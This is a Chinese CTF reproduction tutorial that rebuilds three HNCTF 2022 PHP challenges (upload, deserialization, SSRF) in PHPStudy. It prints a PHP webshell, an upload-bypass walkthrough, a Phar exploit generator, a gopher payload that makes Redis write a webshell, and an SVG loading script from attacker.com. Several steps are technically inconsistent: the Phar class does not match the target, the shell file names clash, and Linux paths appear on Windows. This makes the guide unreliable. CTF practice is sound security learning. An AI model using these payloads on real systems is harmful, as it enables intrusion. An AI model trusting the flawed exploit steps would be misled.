PHPStudy环境下，手把手复现HNCTF 2022的3个典型Web漏洞（文件上传+反序列化+SSRF）

PHPStudy环境下实战复现HNCTF 2022三大Web漏洞

在网络安全攻防演练中，漏洞复现是提升实战能力的关键环节。本文将基于Windows平台下的PHPStudy环境，深度还原HNCTF 2022比赛中easy_upload（文件上传）、easy_unser（反序列化）和ez_ssrf（SSRF）三道典型Web题目的漏洞场景。通过环境搭建、漏洞分析、Exploit编写到最终利用的完整闭环，帮助中级安全研究者建立系统的漏洞复现方法论。

1. 环境准备与靶场搭建

1.1 PHPStudy基础配置

首先下载最新版PHPStudy（v8.1或更高版本），安装时勾选以下组件：

• Apache 2.4.39
• PHP 7.3.4（需与题目原始环境版本匹配）
• MySQL 5.7.26

安装完成后，在php.ini中需要特别开启的关键配置：

allow_url_include = On allow_url_fopen = On display_errors = On short_open_tag = On

1.2 题目环境部署

为每个漏洞创建独立的虚拟主机：

1. 在vhosts.conf中添加三个站点配置：

<VirtualHost *:80> DocumentRoot "C:/phpstudy_pro/WWW/easy_upload" ServerName upload.test </VirtualHost> <VirtualHost *:80> DocumentRoot "C:/phpstudy_pro/WWW/easy_unser" ServerName unser.test </VirtualHost> <VirtualHost *:80> DocumentRoot "C:/phpstudy_pro/WWW/ez_ssrf" ServerName ssrf.test </VirtualHost>

2. 修改本地hosts文件添加域名解析：

127.0.0.1 upload.test unser.test ssrf.test

2. easy_upload文件上传漏洞实战

2.1 漏洞代码分析

在upload.test站点部署以下模拟代码：

<?php if(isset($_FILES['file'])){ $tmp_name = $_FILES['file']['tmp_name']; $name = $_FILES['file']['name']; if(move_uploaded_file($tmp_name, "uploads/".$name)){ echo "Upload success! Path: uploads/$name"; } } ?> <form method="post" enctype="multipart/form-data"> <input type="file" name="file"> <button>Upload</button> </form>

关键缺陷：

• 未校验文件类型和内容
• 未重命名上传文件
• 未禁用脚本执行权限

2.2 漏洞利用五步法

1. 制作PHP webshell：

<?php system($_GET['cmd']); ?>

2. 使用Burp修改文件类型：

Content-Disposition: form-data; name="file"; filename="shell.jpg" Content-Type: image/jpeg

3. 上传后访问webshell执行命令：

http://upload.test/uploads/shell.php?cmd=whoami

4. 获取flag路径：

find / -name "*flag*" 2>/dev/null

5. 使用蚁剑连接管理：

• 连接URL：http://upload.test/uploads/shell.php
• 密码：cmd

实际防御中应配置.htaccess禁止脚本执行：
AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi

3. easy_unser反序列化漏洞复现

3.1 漏洞环境构建

部署以下反序列化入口代码：

<?php class VulnerableClass { private $cmd = "id"; function __destruct() { system($this->cmd); } } if(isset($_GET['data'])){ unserialize($_GET['data']); } ?>

3.2 Phar反序列化利用

1. 构造恶意序列化数据生成器：

<?php class Exploit { public $cmd = "cat /flag"; } $phar = new Phar("exploit.phar"); $phar->startBuffering(); $phar->setStub("<?php __HALT_COMPILER(); ?>"); $phar->setMetadata(new Exploit()); $phar->addFromString("test.txt", "test"); $phar->stopBuffering(); ?>

2. 上传phar文件后触发：

http://unser.test/vuln.php?data=phar://uploads/exploit.phar

绕过技巧：

• 使用preg_replace修改序列化属性数量：

$payload = str_replace(':2:', ':3:', serialize($obj));

• 利用php://filter链式编码：

php://filter/convert.base64-encode/resource=phar://./exploit.phar

4. ez_ssrf服务器端请求伪造

4.1 模拟内网环境搭建

1. 在ssrf.test创建内网服务模拟：

<?php // flag.php (内网服务) if($_SERVER['REMOTE_ADDR'] === '127.0.0.1'){ die("FLAG{THIS_IS_SSRF_FLAG}"); } ?>

2. 部署存在SSRF的接口：

<?php // ssrf.php if(isset($_GET['url'])){ echo file_get_contents($_GET['url']); } ?>

4.2 多协议利用方案

HTTP协议利用：

http://ssrf.test/ssrf.php?url=http://127.0.0.1/flag.php

Gopher协议高级利用：

1. 构造攻击内网Redis的payload：

import urllib.parse payload = """ SET injected_key "<?php system($_GET['cmd']);?>" CONFIG SET dir /var/www/html CONFIG SET dbfilename shell.php SAVE """ print(urllib.parse.quote(payload.replace("\n","\r\n")))

2. 发送SSRF请求：

gopher://127.0.0.1:6379/_[编码后的payload]

防御方案对比表：

5. 联合利用与防御加固

5.1 漏洞组合利用案例

1. 通过SSRF访问本地Phar文件触发反序列化：

http://ssrf.test/ssrf.php?url=phar:///path/to/exploit.phar

2. 上传包含SSRF payload的SVG文件：

<svg xmlns="http://www.w3.org/2000/svg"> <script xlink:href="http://attacker.com/ssrf.js"/> </svg>

5.2 企业级防御方案

PHPStudy安全配置清单：

1. 修改Apache默认配置：

<Directory "C:/phpstudy_pro/WWW"> Options -Indexes -ExecCGI php_flag engine off </Directory>

2. 安装开源WAF：

git clone https://github.com/SpiderLabs/ModSecurity cp modsecurity.conf-recommended /path/to/modsecurity.conf

在漏洞复现过程中，建议使用VirtualBox快照功能保存不同阶段的实验环境状态。遇到问题时，可参考PHP错误日志路径：C:/phpstudy_pro/Extensions/php_logs/php_error.log